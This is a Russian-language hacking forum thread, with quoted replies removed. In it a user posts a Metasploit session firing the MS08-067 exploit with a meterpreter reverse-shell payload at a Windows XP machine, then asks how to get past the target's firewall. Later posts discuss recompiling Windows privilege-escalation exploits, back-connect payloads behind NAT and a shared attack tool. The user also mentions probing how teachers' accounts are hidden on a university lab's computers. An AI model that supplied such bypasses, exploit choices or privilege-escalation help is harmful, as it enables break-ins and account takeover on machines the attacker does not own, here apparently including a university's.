![]() |
Тестирую этот эксплоит на чистой win xp sp2. Вот если фаер отключен, то все работает, а когда включаю, то коннекттаймаут.
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3 RHOST => 192.168.0.3 msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > set LHOST 192.168.0.1 LHOST => 192.168.0.1 msf exploit(ms08_067_netapi) > exploit [*] Started reverse TCP handler on 192.168.0.1:4444 [-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.0.3:445).[*] Exploit completed, but no session was created. Можно ли как-то обойти это при включенном фаерволе ? Какой бы еще попробовать эксплойт. Пробовал через armitage в кали, там автоматический пробивал через ms08-67 систему, но с включенным фаером ни один сплойт, из тех, что armitage подбирает, не проходят. |
Цитата:
|
Цитата:
Еще заодно вопрос про windows server 2003 r2 sp2, поставил такой на виртуалку, 445 порт открыт, но сплойт выдает, что [*] Automatically detecting the target...[*] Fingerprint: Windows 2003 Service Pack 2 - lang:Unknown[*] Could not determine the exact language pack[*] Exploit completed, but no session was created. Правильно, что все r2 серваки этой атаке не подвержены ? Просто в списке уязвимых машин есть Windows 2003 SP2 English (NX) списки такого вида, но r2 нету в том списке, или тут sp2 если уязвима, то r2 тоже ? |
Цитата:
|
Цитата:
|
Цитата:
|
А каким бы компилятором можно под винду перекомпилить исходники локальных эксплойтов, хочу пересобрать эксплойты локальные для повышения прав. (который отсюда exploit\local\windows)Но если брать visual studio, то она найдет кучу ошибок и придется каждый править, подскажите компилятор, который переваривает нормально этот синтаксис.
Идея в том, чтобы не возиться с multi handler, а сразу запускать их из винды. Кстати с multi handler тоже есть проблемы, в локалке все норм, а во внешней сети облом из-за того что нет прямого ип, а только серый вида 192.168.*.* Вот нашел их на гитхаб, https://github.com/rapid7/metasploit.../windows/local У них синатксис не совсем сишный, поэтому конвертер хотя бы для них найти, чтобы в си, а потом наверно gcc можно компиль использовать. |
Цитата:
|
Цитата:
Цитата:
Дальше вопрос только в том, чтобы начинка дала бэк-коннект на правильный IP и порт. |
Цитата:
Цитата:
Кстати на 2008 и 7 прокатывали локальные эксплойты kitapr0d, ms16-032, potato, flatenrec, taihou64 это вот то что вспомнил, вроде еще какие-то пробовал. А на 2003 чет не получается, которые с r2 sp2. Может кто делал подборку эксплойтов собранных для повышения прав, заметил, что в exploit-db эти эксплойты часто надо доправлять по мелким ошибкам, к примеру, многие там почему-то забывают выделять память указателям структур) |
Цитата:
Цитата:
Цитата:
|
Цитата:
Цитата:
|
Цитата:
http://rgho.st/6CHz9D4tb Одна из моих старых частично заброшенных разработок. Цитата:
|
Цитата:
Тут еще про удаленные компы, вот заметил в универе класс компов, туда в учетки преподы заходят по логину-пассу корпоративной почты. Но в lusrmgr.msc их логинов нету, а папки в users их есть, винда 7, вот как их так спрятали интересно. В net user их тоже нету. А dsa.msc не открылась на тех компах, думал доменные юзеры. |
Цитата:
Реальный вариант - искать C/C+ исходники этих же эксплойтов, либо уже скомпилированные программы. |
Цитата:
|
А, это другое дело.
|
| Время: 19:37 |